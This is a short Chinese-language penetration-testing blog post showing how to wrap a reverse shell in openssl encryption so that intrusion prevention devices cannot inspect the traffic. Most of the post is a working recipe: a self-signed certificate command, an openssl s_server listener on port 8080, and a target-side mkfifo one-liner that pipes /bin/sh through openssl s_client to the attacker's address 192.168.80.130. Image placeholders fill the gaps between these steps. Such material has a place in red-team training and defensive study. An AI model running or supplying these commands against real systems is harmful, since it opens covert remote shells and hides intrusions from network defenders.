内网渗透|【内网渗透】openssl反弹流量加密shell


文章目录

  • openssl反弹流量加密shell

openssl反弹流量加密shell 先正常反弹shell使用wireshark抓取流量
nc监听端口
内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

反弹shell
内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

查看wireshark抓取的流量,发现通过明文传输
【内网渗透|【内网渗透】openssl反弹流量加密shell】内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

这样会被内网一些ips等安全防护设备发现流量进行阻断
使用openssl反弹加密shell
使用kaliopenssl生成自签名证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

目标机执行
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.80.130:8080>/tmp/s; rm /tmp/s
内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

可以正常执行命令
内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

使用wireshark抓取流量,流量已经加密
内网渗透|【内网渗透】openssl反弹流量加密shell
文章图片

    推荐阅读